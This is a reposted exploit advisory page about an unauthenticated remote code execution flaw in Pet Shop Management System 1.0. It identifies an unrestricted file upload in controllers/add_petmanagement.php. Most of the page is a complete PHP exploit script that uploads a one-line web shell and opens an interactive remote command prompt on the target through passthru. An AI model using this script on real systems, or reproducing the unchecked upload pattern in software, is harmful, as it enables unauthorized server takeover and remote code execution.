Exploit/Advisories no image

Published on September 29th, 2021 📆 | 8555 Views ⚑

0

Pet Shop Management System 1.0 Shell Upload – Torchsec


https://www.ispeech.org

# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 28.09.2021
# Author: Mr.Gedik
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html
# Version: 1.0
# https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB

Vulnerable code controllers/add_petmanagement.php
Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"],
$_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" .
addslashes($_FILES["images"]["name"]));

Exploit
#############

< ?php
/*
@author:mrgedik
*/
function anim($msg, $time)
{
$msg = str_split($msg);
foreach ($msg as $ms) {
echo $ms;
usleep($time);
}
}

anim("__ __ _____ _ _ _
| / | / ____| | (_) |
| / |_ __| | __ ___ __| |_| | __
| |/| | '__| | |_ |/ _ / _` | | |/ /
| | | | |_ | |__| | __/ (_| | | <
|_| |_|_(_) _____|___|__,_|_|_|_
", 900);

echo PHP_EOL;
while(1)
{
echo anim("Target (http://example.com/path/): ", 800);
$target = trim(fgets(STDIN));
echo PHP_EOL;
if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {
echo "Not a valid URL".PHP_EOL;
}else {
break;
}
}
@unlink("exp.php");
$fw = fopen("exp.php","a+");
fwrite($fw,'< ?php $_POST[m]($_POST[g]); ?>');
fclose($fw);





$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");
$fields = [
'images' => new CurlFile("exp.php", 'image/png', 'exp.php')
];
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);

$response = curl_exec($ch);
@unlink("exp.php");

if(strstr($response,"success"))
{
while(1)
{
echo anim("root@pwn: ", 800);
$command = trim(fgets(STDIN));
if($command == trim("exit"))
{
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
echo curl_exec($ch);
curl_close ($ch);
}
}else
{
echo anim("Fail", 800);
}

?>

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑